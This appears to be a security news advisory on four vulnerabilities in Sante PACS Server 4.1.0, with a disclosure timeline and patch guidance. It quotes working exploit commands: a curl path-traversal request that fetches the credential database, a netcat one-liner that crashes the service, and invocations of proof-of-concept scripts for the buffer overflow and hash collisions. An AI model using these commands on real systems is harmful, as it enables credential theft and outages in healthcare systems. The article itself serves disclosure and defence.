Security researchers have identified four critical vulnerabilities in Sante PACS Server 4.1.0, a medical imaging solution, exposing systems to remote code execution (RCE), data theft, and denial-of-service (DoS) attacks.
The most severe flaw (CVE-2025-2263) carries a CVSS score of 9.8, enabling unauthenticated attackers to compromise systems via a stack-based buffer overflow.
Technical Breakdown of Vulnerabilities
CVE-2025-2263: Stack-Based Buffer Overflow (CVSS 9.8)
During login authentication, the server decrypts user credentials using OpenSSL’s EVP_DecryptUpdate function but passes a fixed 0x80-byte stack buffer for output.
Attackers supplying overly long encrypted usernames or passwords can overflow this buffer, overwriting critical stack memory.
Code Snippet from Vulnerable Function:
text.text:00000001405CAB25 lea rdx, [rsp+138h+out] ; Fixed 0x80-byte buffer
.text:00000001405CAB2D call cs:EVP_DecryptUpdate
The proof-of-concept script sante_pacs_stack_bof.py triggers a crash by sending crafted ciphertext, leading to control over the instruction pointer (RIP):
pythonpython3 sante_pacs_stack_bof.py -u 'http://[target]:3000/'
Windbg analysis reveals overwritten registers (e.g., RDX=4141414141414129) and a corrupted call stack filled with 0x41414141 values, confirming arbitrary code execution.
CVE-2025-2264: Path Traversal (CVSS 7.5)
The server’s static resource handler fails to properly sanitize user-supplied paths, allowing attackers to retrieve arbitrary files via directory traversal.
A flawed check for /assets/ or valid file extensions enable bypasses:
Exploit Command:
bashcurl --path-as-is -o HTTP.db 'http://[target]:3000/assets/../../.HTTP/HTTP.db'
This retrieves the SQLite database HTTP.db, which contains hashed credentials.
CVE-2025-2265: SHA1 Hash Truncation (CVSS 7.3)
Passwords are zero-padded to 0x2000 bytes, hashed with SHA1, and base64-encoded.
However, the server truncates the hash at the first zero byte, drastically reducing collision resistance. For example:
| Password | Truncated SHA1 Prefix |
|---|---|
K8XkE5DB | 8d00 |
wSZuapO6 | 8d00 |
The script find_password_equivalent.py brute-forces collisions in seconds:
pythonpython3 find_password_equivalent.py 8d00 # Finds match in ~5 seconds
This allows attackers to compromise accounts with weak hash prefixes1.
CVE-2025-2284: Uninitialized Pointer DoS (CVSS 7.5)
The GetWebLoginCredentials function parses multipart/form-data requests but accesses uninitialized pointers if form fields lack subsequent lines.
Sending a malformed request crashes the service:
bashecho -ne 'GET /usrname HTTP/1.1\r\n\r\n' | nc -q 0 [target] 3000
Windbg logs show an access violation at Sante_PACS_Server+0x170f9b, halting the process.
Mitigation and Response
Santesoft has patched these flaws in version 4.2.0. Administrators should:
- Immediately upgrade to the latest release.
- Segment networks hosting medical imaging systems.
- Monitor for anomalous HTTP requests targeting ports 3000/TCP.
Disclosure Timeline
- 2025-02-26: Vulnerabilities reported to Santesoft.
- 2025-03-11: Vendor confirms fixes in 4.2.0.
- 2025-03-14: Public advisories released.
These vulnerabilities underscore risks in healthcare IT systems, where outdated cryptographic practices and insufficient input validation create exploitable attack surfaces.
Organizations must prioritize patch deployment to prevent breaches of sensitive patient data.
Also Read:
%20(1)%20(1).webp?w=1200&resize=1200,0&ssl=1&description=The most severe flaw carries a CVSS score of 9.8, enabling unauthenticated attackers to compromise systems via a stack-based buffer overflow.){kind=link}